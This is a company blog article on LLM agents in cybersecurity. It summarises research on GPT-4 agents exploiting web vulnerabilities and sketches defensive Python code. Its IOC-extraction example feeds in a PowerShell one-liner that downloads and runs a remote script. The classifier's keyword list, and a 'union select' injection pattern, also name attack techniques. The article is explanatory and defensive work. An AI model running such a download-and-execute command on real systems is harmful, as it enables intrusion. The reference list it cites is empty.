LLMs in cybersecurity: a double-edged sword of innovation and risk

As the use of LLMs increases, malicious actors are increasingly exploiting autonomous LLM agents to carry out cyberattacks effectively. However, this is also an opportunity for offensive cybersecurity and red teams.

Unsurprisingly, generative AI has facilitated several sophisticated, large-scale cyberattacks. In early 2024, OpenAI [1] and Microsoft [2] revealed that several threat actors, suspected of being linked to state organizations, had used their generative AI services to assist their cybercriminal activities (writing malicious scripts or code, social engineering, vulnerability research, post-exploitation activities, etc.). Deepfakes are also prevalent: while images like the Pope in a winter jacket might have amused us, the case of a financial sector employee paying out $25 million after a video call with a fake “financial director” is a stark reminder of the realism and deception that deepfakes can achieve [3]. Data leakage, for example through public generative AI tools (Samsung [4]), legal issues (Stability AI [5]) and disinformation [6] complete this rapid and non-exhaustive overview of the threats arising from the use of AI and LLM agents.

Leveraging LLM agents for cybersecurity applications

Improvements of LLM performance

In recent years, large language models (LLMs) have advanced to the point of being able to interact with various tools (e.g., by calling functions), read documents and execute processes recursively. These capabilities are enabled through carefully designed APIs and prompt engineering, rather than any intrinsic or “conscious” mechanisms. As a result, LLMs can now operate autonomously as agents [7]. The emergence of models such as GPT-4 has thus enabled LLMs to integrate with different tools, execute commands and perform autonomous operations with minimal human intervention.
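To make the "calling functions" idea concrete, here is a minimal sketch of the dispatch step that sits between a model and its tools. It assumes the model emits a tool call as a JSON object with `name` and `arguments` keys; that shape, the `TOOLS` registry and both tool functions are hypothetical, and real provider APIs differ in their details.

```python
import json
from typing import Callable


# Hypothetical tools: the names and behavior are illustrative only.
def read_document(path: str) -> str:
    """Return canned text so the sketch runs offline."""
    return f"(contents of {path})"


def add(a: float, b: float) -> float:
    return a + b


# Registry mapping the tool names exposed to the model to Python callables.
TOOLS: dict[str, Callable[..., object]] = {
    "read_document": read_document,
    "add": add,
}


def dispatch(tool_call_json: str) -> str:
    """Run one tool call emitted by the model as JSON; return the result as text."""
    call = json.loads(tool_call_json)
    name, args = call["name"], call.get("arguments", {})
    if name not in TOOLS:
        # Unknown tools are refused rather than executed.
        return f"error: unknown tool {name!r}"
    try:
        return str(TOOLS[name](**args))
    except TypeError as exc:
        # Wrong or missing arguments are reported back to the model as text.
        return f"error: bad arguments for {name}: {exc}"
```

The text returned by `dispatch` would be appended to the conversation so the model can decide on its next step. Only registered tools can run, which is where the "carefully designed APIs" mentioned above constrain what an agent can do.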

Enhanced Processing Capabilities of LLM agents

Modern LLM agents are equipped with several advanced features that enhance their functionality:



- Perception: in addition to processing classic user-provided inputs such as prompts, images and data, multimodal LLMs can draw on multiple sensors, integrating various types of data, including text, images, audio and video, for a more comprehensive and contextual understanding of the information received.

- Action: these LLM agents can interact with third-party software tools from which they retrieve information and perform a variety of actions, such as accessing web browsers, terminals and APIs, and executing commands.

- Autonomous planning and document reading (Brain): LLM agents can formulate and adapt strategies based on feedback, enabling them to navigate and solve complex tasks autonomously. They can also ingest and process large quantities of text, extract relevant information and apply it contextually to their operations.
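The three components above can be sketched as a simple loop. This is an illustrative toy, not the architecture of any specific framework: the `Agent` class, the action strings and the stubbed file system are all assumptions, and the `plan` method uses hard-coded rules where a real agent would prompt an LLM with its goal and memory.

```python
from dataclasses import dataclass, field


@dataclass
class Agent:
    goal: str
    memory: list[str] = field(default_factory=list)  # observations collected so far

    def perceive(self, observation: str) -> None:
        """Perception: record a new observation (plain text in this sketch)."""
        self.memory.append(observation)

    def plan(self) -> str:
        """Brain: choose the next action from the current memory.

        Hard-coded rules stand in for the LLM call a real agent would make.
        """
        if not self.memory:
            return "list_files"
        if "report.txt" in self.memory[-1]:
            return "read:report.txt"
        return "stop"


def act(action: str) -> str:
    """Action: execute the chosen action against a stubbed environment."""
    fake_fs = {"report.txt": "quarterly numbers"}  # hypothetical file system
    if action == "list_files":
        return ", ".join(fake_fs)
    if action.startswith("read:"):
        return fake_fs.get(action.split(":", 1)[1], "not found")
    return ""


def run(agent: Agent, max_steps: int = 5) -> list[str]:
    """Alternate plan, act and perceive until the agent stops or runs out of steps."""
    trace = []
    for _ in range(max_steps):
        action = agent.plan()
        if action == "stop":
            break
        trace.append(action)
        agent.perceive(act(action))
    return trace
```

The `max_steps` cap is a deliberate design choice: because each action feeds the next planning step, an agent without a step budget could loop indefinitely.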

One of the foundational papers on this topic, from the Fudan NLP Group [7], one of the earliest natural language processing research groups in China, illustrates how these three components work together.

LLM agents in Offensive Security: A new era of cyber threats?

Are autonomous LLM agent exploits on the horizon?

The latest results [8] [9] [10] herald the start of a new era in offensive security. Although this work has certain methodological limitations, particularly regarding the repeatability of experiments and certain cybersecurity-related aspects, it is important to recognize that it nonetheless provides:

- A significant contribution to software automation, by combining the capabilities of LLM agents for analyzing public vulnerabilities, code and content.

- A reflection on the potential contribution of LLMs to the development of exploits or of tools used for reconnaissance and for identifying vulnerable systems.

Some scenarios have long been considered [10]: some APTs could become even more persistent thanks to autonomous LLM agents which, in the future, will be able to “remember” information collected during the reconnaissance phase and use it to build, plan and execute an infiltration plan, and above all to avoid and react to countermeasures.

Case study: autonomous LLM exploiting vulnerabilities

In their research [8], Daniel Kang, Professor of Computer Science at the University of Illinois (UIUC), and his team of researchers Richard Fang, Rohan Bindu, Akul Gupta and Qiusi Zhan tested 15 different vulnerabilities on websites. The vulnerabilities ranged from simple SQL injections to complex attacks combining XSS and CSRF. The models tested included GPT-4, GPT-3.5 and several open-source LLMs. While the open-source models were unsuccessful at the time of writing, GPT-4 was able to carry out a few web attacks that the authors consider complex:

- Blind SQL Injection: the LLM agent, utilizing GPT-4, browsed multiple Web pages, attempted to obtain default login information and successfully executed a SQL union attack to retrieve sensitive data.

- SSTI (Server-Side Template Injection): the LLM agent, with GPT-4, exploited SSTI vulnerabilities by injecting code to read files on the server, demonstrating its ability to perform complex multi-step attacks.

Their second paper [9] focuses on known vulnerabilities (14 CVEs, 1 unattributed), primarily in web frameworks, most of which have been exploited publicly. While these vulnerabilities and their exploit code are not overly complex, the use of agents in the architecture described above provides a blueprint for automation that goes beyond today’s simple bots.

A third paper [10] also shows the growing role of artificial intelligence in offensive cybersecurity through the development of ReaperAI, an autonomous agent capable of simulating and executing cyberattacks. ReaperAI, which relies on large language models like GPT-4, demonstrates its capacity to identify and exploit vulnerabilities in test environments such as Hack The Box.

Autonomous exploit of vulnerabilities by LLM agents: some gray areas remain

To better understand the current state of research and to avoid any confusion, particularly regarding the idea of LLM agents being able to “operate autonomously”, it is useful to point out the limits of these research papers:

Clarifications needed:

- The details of the configuration and deployment of the Web applications tested (framework, language, database, business logic) are not provided.

- The complexity of a vulnerability does not depend solely on its type. For example, some blind SQL injections may be easier to identify than an XSS. The absence of these details limits the possibility of transposing the results to concrete cases.

- Agent code and prompts were deemed too sensitive to be shared. However, this did not prevent certain information from being made available on a platform such as GitHub without compromising the sensitive parts.

Limited comparison:

- Tools such as SQLMap or BurpSuite are also capable of performing certain detections and exploits automatically. Comparing them with LLM agents on the same vulnerabilities would lay the foundations of a common benchmark and show whether standalone LLM agents actually outperform automatic vulnerability exploitation tools.
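Such a comparison could start from something as simple as a shared trial log and a per-vulnerability success rate. The sketch below assumes a log of `(tool, vulnerability, success)` tuples; the tool labels and every value in `TRIALS` are placeholders for illustration, not measurements from the papers or from any real tool.

```python
from collections import defaultdict

# Hypothetical trial log: (tool, vulnerability, success).
# These values are placeholders, NOT results from any paper or tool.
TRIALS = [
    ("llm_agent", "sqli", True),
    ("llm_agent", "sqli", False),
    ("llm_agent", "ssti", True),
    ("scanner", "sqli", True),
    ("scanner", "sqli", True),
    ("scanner", "ssti", False),
]


def success_rates(trials):
    """Return {tool: {vulnerability: fraction of successful attempts}}."""
    # Each cell holds [successes, attempts] for one (tool, vulnerability) pair.
    counts = defaultdict(lambda: defaultdict(lambda: [0, 0]))
    for tool, vuln, ok in trials:
        cell = counts[tool][vuln]
        cell[0] += int(ok)
        cell[1] += 1
    return {
        tool: {vuln: s / n for vuln, (s, n) in vulns.items()}
        for tool, vulns in counts.items()
    }
```

Recording several attempts per vulnerability, rather than a single pass or fail, also speaks to the repeatability concern raised earlier, since LLM agents do not necessarily behave identically from one run to the next.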

Review: At the time of writing, the article had not yet been submitted for peer review.

Leveraging LLM agents to boost cybersecurity blue teams’ operations

Harnessing LLM agents for cyber defense

Nevertheless, the ability of LLM agents to retain the context of the many intermediate stages needed to carry out an end-to-end application attack, from discovery to exploitation, should not be overlooked. This autonomy could lead to attacks at much greater scale, even if they are not becoming any more complex at present. Anticipation is therefore essential.



But this autonomy can also offer defenders a considerable advantage. At I-TRACING, we are building on this agent model architecture to develop a code analyzer, enriched with Cyber Threat Intelligence (CTI) data:

The aim is to provide the investigating analyst with a fast, multi-language tool for classifying the different types of code that can be found (e.g. macro, PowerShell script, web execution code, injection pattern, etc.) and for identifying potential advanced persistent threats (APTs) from MITRE ATT&CK sources, based on the various indicators of compromise (IOCs). These elements are then enriched and/or confirmed by OpenCTI data. Another use case is to classify, from its functional description, whether a script is legitimate or not (e.g. an admin script), a task that is often a source of wasted time.
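As a rough illustration of the two first steps described above (classifying a snippet and pulling out IOCs), here is a deliberately naive, rule-based sketch. It is not the I-TRACING analyzer, which relies on an LLM agent architecture: the regular expressions, the `TYPE_HINTS` keywords and the function names are all assumptions chosen to keep the example short and offline, and no MITRE ATT&CK or OpenCTI lookup is performed.

```python
import re

# Illustrative patterns only; production IOC extraction needs stricter rules.
IOC_PATTERNS = {
    "ipv4": re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b"),
    "url": re.compile(r"https?://[^\s'\"<>)]+"),
    "sha256": re.compile(r"\b[a-fA-F0-9]{64}\b"),
}

# Hypothetical keyword hints per snippet type, checked in order.
TYPE_HINTS = [
    ("powershell", ("invoke-expression", "new-object", "-encodedcommand")),
    ("vba_macro", ("sub autoopen", "createobject(", "end sub")),
    ("sql_injection_pattern", ("union select", "' or '1'='1")),
]


def classify(snippet: str) -> str:
    """Return the first snippet type whose hints appear in the text, else 'unknown'."""
    lowered = snippet.lower()
    for label, hints in TYPE_HINTS:
        if any(hint in lowered for hint in hints):
            return label
    return "unknown"


def extract_iocs(snippet: str) -> dict[str, list[str]]:
    """Return the deduplicated, sorted matches for each IOC pattern."""
    return {
        kind: sorted(set(pattern.findall(snippet)))
        for kind, pattern in IOC_PATTERNS.items()
    }
```

For example, with a snippet that uses a documentation-range IP address:

```python
sample = "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/a.ps1')"
print(classify(sample))      # powershell
print(extract_iocs(sample))  # ipv4 and url entries are populated, sha256 is empty
```

In an agent-based design, the extracted IOCs would then be passed to enrichment steps, which is where CTI sources come in.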

The rise of LLMs: a call for robust patch management

The autonomous nature of these LLM agents raises significant concerns: the absence of human oversight in their operations can lead to unforeseen consequences, and their powerful capabilities make them attractive tools for attackers. The risk of widespread misuse underlines the urgency of addressing these threats. It is therefore essential to raise cybersecurity professionals’ awareness of the current and future capabilities and risks posed by LLM agents. Even though it might sound basic, timely patching, combined with penetration testing by qualified teams, remains one of the most effective defenses against attacks by LLM agents. Organizations must prioritize robust vulnerability management practices to mitigate the risks posed by these autonomous agents. Implementing stringent data security measures and strengthening infrastructure security are essential steps in limiting the associated impact. Securing data storage, encryption and access controls can reduce the risk of data breaches and post-exploitation activities.
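One way to picture "prioritizing vulnerability management" is a patch queue ordered by risk. The sketch below is only an assumed heuristic: the `Finding` fields, the additive weights and the placeholder identifiers are hypothetical, and a real program would rely on its own risk model and asset inventory.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class Finding:
    ident: str             # placeholder identifier, not a real CVE
    cvss: float            # base severity score, 0.0 to 10.0
    internet_facing: bool  # is the affected asset reachable from the internet?
    exploit_public: bool   # is exploit code publicly available?


def priority(finding: Finding) -> float:
    """Assumed weighting: severity, boosted by exposure and public exploits."""
    score = finding.cvss
    if finding.internet_facing:
        score += 2.0
    if finding.exploit_public:
        score += 3.0
    return score


def patch_order(findings: list[Finding]) -> list[str]:
    """Return identifiers sorted from most to least urgent."""
    return [f.ident for f in sorted(findings, key=priority, reverse=True)]
```

The extra weight on publicly exploited issues reflects the research discussed earlier, where agents were tested on known vulnerabilities, most of which had already been exploited publicly.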

Conclusion

The advent of LLM agents in cybersecurity is a double-edged sword. While their capabilities offer powerful defense tools, as I-TRACING strives to use them, their growing potential for autonomous exploitation presents significant challenges. In this evolving cyber landscape, balancing the immense potential and equally profound risks of LLMs is not just necessary: it is the future of cybersecurity. Our vigilance today will shape AI’s role in a safer, more secure tomorrow.

References

Author

Michel CHBEIR, AI Cyber engineer

06 November 2024